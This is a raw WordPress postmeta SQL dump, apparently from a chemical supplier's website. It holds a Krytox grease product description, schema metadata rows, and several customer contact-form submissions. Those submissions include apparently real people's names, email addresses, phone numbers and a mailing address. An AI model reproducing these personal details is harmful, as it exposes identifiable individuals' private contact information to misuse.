INSERT INTO `wp_postmeta` VALUES (43378, 644, '_ywtm_content_tab_description', 'Krytox 240AC grease is based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions such as continuous high temperatures up to 300 °C (572 °F) and higher temperatures for shorter periods, depending on product grade limits. Chemically inert and safe for use around hazardous chemicals, these lubricants are nonflammable and are safe for use in oxygen service. Krytox oils and greases are silicone free and do not damage plastics or elastomers or cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial and semiconductor applications as well as solving many other routine lubrication problems. Krytox greases are the original products that this military specification was written for and have been certified continuously since the specification was originally written. This is the latest data from the re-certification that is required every five years. Krytox greases are standard as NLGI Grade 2 penetration. If the 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n\r\nApplications for Krytox 240AC lubricants are generally of a critical nature with temperatures in all industries reaching extremes for conventional lubricants. They are expected to be durable in the most aggressive environments and are now often considered an integral part of the design. Where failure of components is not an option, whether because of durability, warranty, safety, loss of productivity or down time, Krytox is the lubricant of choice in a wide range of industries and applications.\r\n\r\nIn the aerospace industry, Krytox 240AC grease is applied on various settings spanning from bearings and sealants to o-rings and oxygen systems. Krytox is a valuable asset to the aerospace industry due to its superior performance in a wide range of temperatures scaling from 70 to 399ºC (–100 to 750 ºF). In addition, it is robust in harsh environments and has excellent frictional properties, allowing it to resist change in properties over time, provide longer wear, and lower energy consumption. Krytox lubricants are compatible with all metals, elastomers, plastics, paints and finishes. Due to the intense and severe circumstance of the aerospace industry, it can be expected that Krytox delivers a high level of product excellence.'); 
INSERT INTO `wp_postmeta` VALUES (43381, 1248, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43382, 1248, '_schema_json_timestamp', '1502734760'); 
INSERT INTO `wp_postmeta` VALUES (43384, 871, '_schema_json_timestamp', '1503338561'); 
INSERT INTO `wp_postmeta` VALUES (43386, 1139, '_schema_json_timestamp', '1503116357'); 
INSERT INTO `wp_postmeta` VALUES (43388, 1881, '_schema_json_timestamp', '1503077294'); 
INSERT INTO `wp_postmeta` VALUES (43389, 1691, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43390, 1691, '_schema_json_timestamp', '1502741241'); 
INSERT INTO `wp_postmeta` VALUES (43391, 1222, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43392, 1222, '_schema_json_timestamp', '1502741966'); 
INSERT INTO `wp_postmeta` VALUES (43395, 1463, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43396, 1655, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43397, 1655, '_schema_json_timestamp', '1502747571'); 
INSERT INTO `wp_postmeta` VALUES (43398, 376, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43399, 376, '_schema_json_timestamp', '1502748718'); 
INSERT INTO `wp_postmeta` VALUES (43400, 2462, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43401, 2462, '_schema_json_timestamp', '1502750010'); 
INSERT INTO `wp_postmeta` VALUES (43402, 1762, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43403, 1762, '_schema_json_timestamp', '1502780885'); 
INSERT INTO `wp_postmeta` VALUES (43404, 739, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43405, 739, '_schema_json_timestamp', '1502751641'); 
INSERT INTO `wp_postmeta` VALUES (43406, 1761, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43407, 4351, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43408, 4351, '_schema_json_timestamp', '1502758359'); 
INSERT INTO `wp_postmeta` VALUES (43409, 2619, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43410, 2619, '_schema_json_timestamp', '1502758561'); 
INSERT INTO `wp_postmeta` VALUES (43411, 1281, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43412, 3065, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43413, 3065, '_schema_json_timestamp', '1502759765'); 
INSERT INTO `wp_postmeta` VALUES (43416, 2493, '_schema_json_timestamp', '1503312480'); 
INSERT INTO `wp_postmeta` VALUES (43418, 1416, '_schema_json_timestamp', '1503119225'); 
INSERT INTO `wp_postmeta` VALUES (43420, 1759, '_schema_json_timestamp', '1503192865'); 
INSERT INTO `wp_postmeta` VALUES (43421, 1942, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43422, 1942, '_schema_json_timestamp', '1502765321'); 
INSERT INTO `wp_postmeta` VALUES (43424, 387, '_schema_json_timestamp', '1503300581'); 
INSERT INTO `wp_postmeta` VALUES (43426, 1449, '_schema_json_timestamp', '1503091460'); 
INSERT INTO `wp_postmeta` VALUES (43428, 1073, '_schema_json_timestamp', '1503248626'); 
INSERT INTO `wp_postmeta` VALUES (43430, 3312, '_schema_json_timestamp', '1503084534'); 
INSERT INTO `wp_postmeta` VALUES (43432, 1576, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43433, 1576, '_schema_json_timestamp', '1502767442'); 
INSERT INTO `wp_postmeta` VALUES (43434, 1075, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43435, 1075, '_schema_json_timestamp', '1502767802'); 
INSERT INTO `wp_postmeta` VALUES (43436, 4660, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43437, 4660, '_schema_json_timestamp', '1502768935'); 
INSERT INTO `wp_postmeta` VALUES (43438, 323, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43439, 323, '_schema_json_timestamp', '1502769003'); 
INSERT INTO `wp_postmeta` VALUES (43440, 1758, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43441, 1758, '_schema_json_timestamp', '1502769446'); 
INSERT INTO `wp_postmeta` VALUES (43443, 1696, '_schema_json_timestamp', '1502897781'); 
INSERT INTO `wp_postmeta` VALUES (43444, 698, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43445, 698, '_schema_json_timestamp', '1502769855'); 
INSERT INTO `wp_postmeta` VALUES (43447, 1924, '_schema_json_timestamp', '1503346350'); 
INSERT INTO `wp_postmeta` VALUES (43450, 1757, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43451, 1757, '_schema_json_timestamp', '1502773993'); 
INSERT INTO `wp_postmeta` VALUES (43452, 523, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43453, 523, '_schema_json_timestamp', '1502774527'); 
INSERT INTO `wp_postmeta` VALUES (43454, 1751, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43455, 1751, '_schema_json_timestamp', '1502776724'); 
INSERT INTO `wp_postmeta` VALUES (43457, 4187, '_schema_json_timestamp', '1503294602'); 
INSERT INTO `wp_postmeta` VALUES (43458, 374, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43459, 374, '_schema_json_timestamp', '1502778213'); 
INSERT INTO `wp_postmeta` VALUES (43460, 1756, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43461, 1756, '_schema_json_timestamp', '1502778540'); 
INSERT INTO `wp_postmeta` VALUES (43462, 2243, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43463, 2243, '_schema_json_timestamp', '1502901754'); 
INSERT INTO `wp_postmeta` VALUES (43465, 1755, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43466, 1755, '_schema_json_timestamp', '1502783087'); 
INSERT INTO `wp_postmeta` VALUES (43467, 957, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43468, 957, '_schema_json_timestamp', '1502787024'); 
INSERT INTO `wp_postmeta` VALUES (43469, 1217, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43470, 3291, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43471, 3291, '_schema_json_timestamp', '1502788451'); 
INSERT INTO `wp_postmeta` VALUES (43473, 1239, '_schema_json_timestamp', '1503218071'); 
INSERT INTO `wp_postmeta` VALUES (43475, 1893, '_schema_json_timestamp', '1503069970'); 
INSERT INTO `wp_postmeta` VALUES (43476, 1580, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43477, 1983, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43478, 1983, '_schema_json_timestamp', '1502791477'); 
INSERT INTO `wp_postmeta` VALUES (43479, 1201, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43480, 1201, '_schema_json_timestamp', '1502795773'); 
INSERT INTO `wp_postmeta` VALUES (43481, 2888, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43482, 2888, '_schema_json_timestamp', '1502797384'); 
INSERT INTO `wp_postmeta` VALUES (43484, 618, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43485, 618, '_schema_json_timestamp', '1502800812'); 
INSERT INTO `wp_postmeta` VALUES (43487, 911, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43488, 4608, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43489, 4608, '_schema_json_timestamp', '1502802791'); 
INSERT INTO `wp_postmeta` VALUES (43490, 1462, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43491, 3756, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43492, 3756, '_schema_json_timestamp', '1502806698'); 
INSERT INTO `wp_postmeta` VALUES (43494, 584, '_schema_json_timestamp', '1502984740'); 
INSERT INTO `wp_postmeta` VALUES (43499, 3307, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43500, 3307, '_schema_json_timestamp', '1502809866'); 
INSERT INTO `wp_postmeta` VALUES (43504, 596, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43505, 596, '_schema_json_timestamp', '1502811210'); 
INSERT INTO `wp_postmeta` VALUES (43510, 1032, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43511, 1032, '_schema_json_timestamp', '1502862203'); 
INSERT INTO `wp_postmeta` VALUES (43517, 885, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43518, 4837, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (43519, 4837, '_seq_num', '890'); 
INSERT INTO `wp_postmeta` VALUES (43520, 4837, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (43521, 4837, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (43522, 4837, '_field_1', 'Emily Hyde'); 
INSERT INTO `wp_postmeta` VALUES (43523, 4837, '_field_10', 'NN, Inc. - Lacey Division'); 
INSERT INTO `wp_postmeta` VALUES (43524, 4837, '_field_2', 'emily.hyde@nninc.com'); 
INSERT INTO `wp_postmeta` VALUES (43525, 4837, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (43526, 4837, '_field_3', 'Can you please send me your updated ISO cert?'); 
INSERT INTO `wp_postmeta` VALUES (43527, 4837, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (43528, 4837, '_sub_id', '4837'); 
INSERT INTO `wp_postmeta` VALUES (43533, 2313, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43534, 2313, '_schema_json_timestamp', '1502816311'); 
INSERT INTO `wp_postmeta` VALUES (43536, 798, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43537, 798, '_schema_json_timestamp', '1502816961'); 
INSERT INTO `wp_postmeta` VALUES (43538, 4838, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (43539, 4838, '_seq_num', '891'); 
INSERT INTO `wp_postmeta` VALUES (43540, 4838, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (43541, 4838, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (43542, 4838, '_field_1', 'Bob Bianchi'); 
INSERT INTO `wp_postmeta` VALUES (43543, 4838, '_field_10', 'Eruston'); 
INSERT INTO `wp_postmeta` VALUES (43544, 4838, '_field_2', 'bianchi@eruston.com'); 
INSERT INTO `wp_postmeta` VALUES (43545, 4838, '_field_8', '(714) 669-9001'); 
INSERT INTO `wp_postmeta` VALUES (43546, 4838, '_field_3', 'Six 14 oz cans of Urethane Conformal Coating MS-470C (DOT 2Q M5655) purchased in September 2016 do not work due to the propellant. Please send replacements to Eruston Corp. at 1007 W. Grove, Unit E, Orange, CA 92865-4153.'); 
INSERT INTO `wp_postmeta` VALUES (43547, 4838, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (43548, 4838, '_sub_id', '4838'); 
INSERT INTO `wp_postmeta` VALUES (43549, 1132, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43550, 1132, '_schema_json_timestamp', '1502817529'); 
INSERT INTO `wp_postmeta` VALUES (43554, 1423, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43555, 1423, '_schema_json_timestamp', '1502820895'); 
INSERT INTO `wp_postmeta` VALUES (43561, 1877, '_schema_json_timestamp', '1503082721'); 
INSERT INTO `wp_postmeta` VALUES (43563, 4226, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43564, 4226, '_schema_json_timestamp', '1502823504'); 
INSERT INTO `wp_postmeta` VALUES (43576, 1166, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43585, 1030, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43586, 1030, '_schema_json_timestamp', '1502828557'); 
INSERT INTO `wp_postmeta` VALUES (43591, 1768, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43594, 3297, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43595, 1085, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43596, 1085, '_schema_json_timestamp', '1502830956'); 
INSERT INTO `wp_postmeta` VALUES (43597, 888, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43600, 1081, '_schema_json_timestamp', '1503399083'); 
INSERT INTO `wp_postmeta` VALUES (43601, 907, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43603, 4839, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (43604, 4839, '_seq_num', '892'); 
INSERT INTO `wp_postmeta` VALUES (43605, 4839, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (43606, 4839, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (43607, 4839, '_field_1', 'Michael Lindsay'); 
INSERT INTO `wp_postmeta` VALUES (43608, 4839, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (43609, 4839, '_field_2', 'mike.j.lindsay@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (43610, 4839, '_field_8', '(714) 457-6942'); 
INSERT INTO `wp_postmeta` VALUES (43611, 4839, '_field_3', 'I am interested in your product. Like to perchance oil for my Toyota Tundra 03 SR5 . '); 
INSERT INTO `wp_postmeta` VALUES (43612, 4839, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (43613, 4839, '_sub_id', '4839'); 
INSERT INTO `wp_postmeta` VALUES (43614, 1220, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43615, 1220, '_schema_json_timestamp', '1502836802'); 
INSERT INTO `wp_postmeta` VALUES (43618, 1561, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43619, 1561, '_schema_json_timestamp', '1502840213'); 
INSERT INTO `wp_postmeta` VALUES (43621, 662, '_schema_json', 'a:11:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:111:"https://www.miller-stephenson.com/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/";}s:3:"url";s:111:"https://www.miller-stephenson.com/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/";s:8:"headline";s:77:"The Chemours Company Selects Wilmington, Delaware for Its Global Headquarters";s:13:"datePublished";s:25:"2016-08-22T20:26:04+00:00";s:12:"dateModified";s:25:"2016-08-22T20:34:27+00:00";s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:312:"WILMINGTON, Del., Aug. 2, 2016 /PRNewswire/ -- Today, Chemours is announcing that it will locate its global headquarters in Wilmington, Delaware. "While we like to think of ourselves as a 200-year-old start-up, we\'ve been an independent, publicly traded company for only just over a year now," said President and";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:20:"ddillulio@mschem.com";s:3:"url";s:61:"https://www.miller-stephenson.com/author/ddilluliomschem-com/";}}'); 
INSERT INTO `wp_postmeta` VALUES (43625, 3990, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43626, 3990, '_schema_json_timestamp', '1502844836'); 
INSERT INTO `wp_postmeta` VALUES (43628, 467, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43629, 473, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43632, 1852, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43636, 2989, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:71:"https://www.miller-stephenson.com/krytox-fpg-028-performance-lubricant/";}s:3:"url";s:71:"https://www.miller-stephenson.com/krytox-fpg-028-performance-lubricant/";s:8:"headline";s:51:"Introducing Krytox™ FPG 028 Performance Lubricant";s:13:"datePublished";s:25:"2016-11-10T15:26:08+00:00";s:12:"dateModified";s:25:"2016-11-10T15:27:44+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_106646615.jpg";s:5:"width";i:1000;s:6:"height";i:563;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:383:"Chemours Introduces Krytox™ FPG 028 Performance Lubricant Designed for use in military and commercial aircraft and supporting equipment. Wilmington, Del., November 10, 2016 – The Chemours Company (“Chemours”) (NYSE: CC), a global chemistry company with leading market positions in titanium technologies, fluoroproducts and chemical solutions, announced today the introduction";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (43642, 1858, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43643, 1858, '_schema_json_timestamp', '1502847771'); 
INSERT INTO `wp_postmeta` VALUES (43646, 4087, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43647, 4087, '_schema_json_timestamp', '1502849306'); 
INSERT INTO `wp_postmeta` VALUES (43659, 1189, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43671, 4224, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43672, 4224, '_schema_json_timestamp', '1502851446'); 
INSERT INTO `wp_postmeta` VALUES (43687, 967, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43692, 1900, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43693, 1900, '_schema_json_timestamp', '1502853755'); 
INSERT INTO `wp_postmeta` VALUES (43703, 954, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43706, 1020, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43707, 1020, '_schema_json_timestamp', '1502855087'); 
INSERT INTO `wp_postmeta` VALUES (43734, 1644, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43748, 4227, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43749, 4227, '_schema_json_timestamp', '1502858179'); 
INSERT INTO `wp_postmeta` VALUES (43754, 1799, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43755, 1799, '_schema_json_timestamp', '1502860979'); 
INSERT INTO `wp_postmeta` VALUES (43759, 1745, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43760, 1745, '_schema_json_timestamp', '1502863530'); 
INSERT INTO `wp_postmeta` VALUES (43761, 1099, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43762, 1099, '_schema_json_timestamp', '1502863733'); 
INSERT INTO `wp_postmeta` VALUES (43763, 1901, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43764, 1984, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43765, 1754, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43766, 1754, '_schema_json_timestamp', '1502869550'); 
INSERT INTO `wp_postmeta` VALUES (43767, 1880, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43768, 1880, '_schema_json_timestamp', '1502870583'); 
INSERT INTO `wp_postmeta` VALUES (43769, 866, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43770, 866, '_schema_json_timestamp', '1502870828'); 
INSERT INTO `wp_postmeta` VALUES (43772, 4659, '_schema_json_timestamp', '1502978406'); 
INSERT INTO `wp_postmeta` VALUES (43773, 3745, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43774, 3745, '_schema_json_timestamp', '1502871829'); 
INSERT INTO `wp_postmeta` VALUES (43776, 2570, '_schema_json_timestamp', '1503231284'); 
INSERT INTO `wp_postmeta` VALUES (43778, 2569, '_schema_json_timestamp', '1503233459'); 
INSERT INTO `wp_postmeta` VALUES (43779, 1076, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43780, 1076, '_schema_json_timestamp', '1502876555'); 
INSERT INTO `wp_postmeta` VALUES (43781, 1430, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43782, 1430, '_schema_json_timestamp', '1502876884'); 
INSERT INTO `wp_postmeta` VALUES (43784, 336, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43785, 336, '_schema_json_timestamp', '1502879024'); 
INSERT INTO `wp_postmeta` VALUES (43786, 1990, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43788, 1150, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43789, 1150, '_schema_json_timestamp', '1502975113'); 
INSERT INTO `wp_postmeta` VALUES (43790, 796, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43792, 4840, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (43793, 4840, '_seq_num', '893'); 
INSERT INTO `wp_postmeta` VALUES (43794, 4840, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (43795, 4840, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (43796, 4840, '_field_1', 'MIRCEA OPREA'); 
INSERT INTO `wp_postmeta` VALUES (43797, 4840, '_field_10', 'Northern Digital Inc.'); 
INSERT INTO `wp_postmeta` VALUES (43798, 4840, '_field_2', 'moprea@ndigital.com'); 
INSERT INTO `wp_postmeta` VALUES (43799, 4840, '_field_8', '(519) 884-5142'); 
INSERT INTO `wp_postmeta` VALUES (43800, 4840, '_field_3', 'Hi, My name is Mircea Oprea and I’m a Mechanical Engineer at Northern Digital Inc. in Waterloo, Ontario, Canada.  In one of our products we are using a small mechanical assembly manufactured by Hubbs Machine in the US. To secure a magnet to this assembly they are using your Epoxy 907 Adhesive System. Please letus know if there is any RoHS and REACh Compliance information available for this product.\r\n\r\nThank you,\r\nMircea Oprea\r\nMechanical Engineer\r\nNDI\r\n103 Randall Drive\r\nWaterloo, ON\r\nCanada\r\nN2V 1C5\r\np 519-884-5142 x259 \r\n'); 
INSERT INTO `wp_postmeta` VALUES (43801, 4840, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (43802, 4840, '_sub_id', '4840'); 
INSERT INTO `wp_postmeta` VALUES (43803, 949, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43804, 949, '_schema_json_timestamp', '1502888882'); 
INSERT INTO `wp_postmeta` VALUES (43806, 2766, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43807, 321, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43808, 321, '_schema_json_timestamp', '1502890221'); 
INSERT INTO `wp_postmeta` VALUES (43809, 1696, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43810, 241, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43811, 241, '_schema_json_timestamp', '1502900164'); 
INSERT INTO `wp_postmeta` VALUES (43813, 946, '_schema_json_timestamp', '1503250471'); 
INSERT INTO `wp_postmeta` VALUES (43814, 1413, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43815, 1413, '_schema_json_timestamp', '1502902554'); 
INSERT INTO `wp_postmeta` VALUES (43816, 945, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43817, 1903, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43818, 1903, '_schema_json_timestamp', '1502902919'); 
INSERT INTO `wp_postmeta` VALUES (43819, 386, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43820, 386, '_schema_json_timestamp', '1502903373'); 
INSERT INTO `wp_postmeta` VALUES (43821, 1000, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43822, 1000, '_schema_json_timestamp', '1502903400'); 
INSERT INTO `wp_postmeta` VALUES (43826, 760, '_schema_json_timestamp', '1503346552'); 
INSERT INTO `wp_postmeta` VALUES (43828, 4102, '_schema_json_timestamp', '1503189568'); 
INSERT INTO `wp_postmeta` VALUES (43830, 1205, '_schema_json_timestamp', '1503304562'); 
INSERT INTO `wp_postmeta` VALUES (43831, 1930, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43832, 1930, '_schema_json_timestamp', '1502907626'); 
INSERT INTO `wp_postmeta` VALUES (43833, 4841, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (43834, 4841, '_seq_num', '894'); 
INSERT INTO `wp_postmeta` VALUES (43835, 4841, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (43836, 4841, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (43837, 4841, '_field_1', 'John Lott'); 
INSERT INTO `wp_postmeta` VALUES (43838, 4841, '_field_10', 'Allied Motion - Globe Motors'); 
INSERT INTO `wp_postmeta` VALUES (43839, 4841, '_field_2', 'jlott@globemotors.com'); 
INSERT INTO `wp_postmeta` VALUES (43840, 4841, '_field_8', '(334) 796-6924'); 
INSERT INTO `wp_postmeta` VALUES (43841, 4841, '_field_3', 'Your company needs to work  on its customer support. I ordered mold release in July, called today to see where it is at and was told still waiting on credit references. Lets get it done folks, Go go go, come on here!'); 
INSERT INTO `wp_postmeta` VALUES (43842, 4841, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (43843, 4841, '_sub_id', '4841'); 
INSERT INTO `wp_postmeta` VALUES (43844, 758, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (43845, 758, '_schema_json_timestamp', '1502912600'); 
INSERT INTO `wp_postmeta` VALUES (43846, 4842, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (43847, 4842, '_seq_num', '895'); 
INSERT INTO `wp_postmeta` VALUES (43848, 4842, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (43849, 4842, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
